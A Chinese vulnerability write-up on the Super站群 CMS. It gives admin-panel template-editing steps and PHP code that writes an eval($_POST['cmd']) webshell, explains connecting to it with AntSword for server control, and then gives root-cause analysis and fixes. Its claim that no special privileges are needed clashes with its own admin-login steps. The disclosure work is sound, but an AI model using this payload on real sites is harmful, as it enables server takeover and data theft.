SUPER站群命令执行之官方审核
字数 898 2025-08-11 22:57:16
Super站群系统文件上传漏洞分析与利用
漏洞概述
桂林思与云文化传媒有限公司开发的Super站群系统最新版本存在高危文件上传漏洞,攻击者可通过后台模板编辑功能写入恶意PHP代码,进而获取服务器控制权限。
漏洞影响
- 影响版本:Super站群系统最新版本(具体版本号未提及)
- 影响范围:所有使用受影响版本的用户
- 危害等级:高危(可直接获取服务器控制权)
漏洞复现步骤
1. 环境搭建
- 从官网(https://www.cmssuper.com/)下载Super站群系统
- 注意:谷歌浏览器可能因Mixed Content问题无法直接下载,需通过调试模式或改用360/IE浏览器
- 安装系统并登录后台(http://sup.com/admin/#/home)
2. 漏洞利用过程
- 进入后台后,导航至:系统设置 → 模板风格
- 下载任意模板(如有需要)
- 选择目标模板,点击"编辑模板"
- 在模板编辑器中插入以下恶意代码:
<?php
$file=fopen("muma.php","w"); // 在根目录创建muma.php文件
fwrite($file,'<');
fwrite($file,'?');
fwrite($file,'php');
fwrite($file,' @eval($_POST["cmd"]);');
fwrite($file,'?>');
?>
- 点击保存模板
- 访问前端页面触发模板解析执行
3. 后渗透利用
- 恶意代码执行后,系统将在网站根目录生成
muma.php文件 - 使用中国蚁剑等WebShell管理工具连接木马:
- 连接地址:
http://目标域名/muma.php - 密码参数:
cmd
- 连接地址:
- 成功连接后可获取:
- 服务器完整控制权限
- 网站源代码
- 数据库配置信息
漏洞原理分析
- 模板编辑功能未对用户输入进行充分过滤
- 系统使用
stripslashes函数对内容进行反斜杠处理,但未对PHP代码执行等危险操作进行限制 - 模板解析机制允许直接执行PHP代码
- 文件写入操作未做安全限制,导致可任意写入WebShell
修复建议
-
临时解决方案:
- 禁用或限制模板编辑功能
- 监控网站目录下的文件变更,特别是.php文件的创建
- 删除已存在的恶意文件(muma.php等)
-
长期解决方案:
- 对模板内容进行严格过滤,禁止PHP代码执行
- 实现文件写入的白名单机制
- 更新到官方修复后的版本
总结
该漏洞利用简单但危害极大,攻击者无需特殊权限即可通过后台模板编辑功能获取服务器控制权。建议所有Super站群系统用户立即检查系统安全性,并按照上述建议进行防护。